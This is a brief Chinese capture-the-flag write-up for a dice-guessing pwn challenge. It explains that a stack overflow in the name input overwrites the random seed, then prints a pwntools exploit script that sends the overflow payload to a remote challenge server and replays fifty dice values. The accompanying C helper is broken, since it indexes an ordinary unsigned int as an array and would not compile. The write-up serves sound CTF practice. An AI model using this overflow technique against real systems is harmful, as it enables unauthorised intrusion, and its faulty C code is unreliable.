Contents

输入姓名时存在栈溢出
覆盖时间种子,编写c程序重放随机数,按序填入即可过关.

from pwn import *
import random
context.log_level = 'debug'
#io = process('./dice_game')
io = remote('47.96.239.28',9999)
io.recv()
io.send(0x40 * 'a' + p32(0x0))
io.recv()
pay = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
for i in pay:
	io.sendline(str(i))
	io.recv()
io.interactive()

#include <stdlib.h>
#include <stdio.h>
int cc();
int main()
{
    unsigned int ss = 0;
    printf("%x\n",ss[0]); 
	srand(ss[0]);
	for(int i = 0 ;i < 50;i++)
    {
       printf("%u,",rand()%6+1);
    }
    return 0;
}